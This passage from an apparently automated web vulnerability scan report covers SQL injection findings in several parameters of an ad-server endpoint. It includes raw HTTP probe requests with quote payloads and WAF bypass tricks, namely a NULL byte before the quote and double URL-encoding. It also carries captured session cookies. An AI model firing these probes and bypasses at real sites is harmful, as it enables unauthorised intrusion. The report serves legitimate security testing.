Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:54 GMT
Content-Length: 2044
Connection: close
Set-Cookie: vf=489; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_JCVEUma2gDZb%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212%2527%2527&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1816
Date: Sat, 17 Sep 2011 01:17:55 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316222275911; Domain=.contextweb.com; Path=/
Set-Cookie: vf=490; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.24. http://tag.contextweb.com/TagPublish/GetAd.aspx [cxy parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The cxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=%00'&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:45 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=536; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:01 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app202_NcHteBNElrNX%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=%00''&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:45 GMT
Content-Length: 2372
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222325784; Domain=.contextweb.com; Path=/
Set-Cookie: vf=537; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.25. http://tag.contextweb.com/TagPublish/GetAd.aspx [dw parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The dw parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dw parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the dw request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300%2527&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:49 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=484; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app209_0s7g5vuuP87p%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300%2527%2527&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/106
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:17:50 GMT
Content-Length: 1708
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222270352; Domain=.contextweb.com; Path=/
Set-Cookie: vf=485; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.26. http://tag.contextweb.com/TagPublish/GetAd.aspx [epid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The epid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the epid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=%00'&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:46 GMT
Content-Length: 2041
Connection: close
Set-Cookie: vf=802; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_N4UEGwHAZheP%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=%00''&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:47 GMT
Content-Length: 2788
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 539292_4_107784_-1=1316224067319; Domain=.contextweb.com; Path=/
Set-Cookie: vf=803; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...

1.27. http://tag.contextweb.com/TagPublish/GetAd.aspx [esid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The esid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid='&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2041
Date: Sat, 17 Sep 2011 01:47:50 GMT
Connection: close
Set-Cookie: vf=806; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app208_1c4prRRFRDCJ%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=''&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
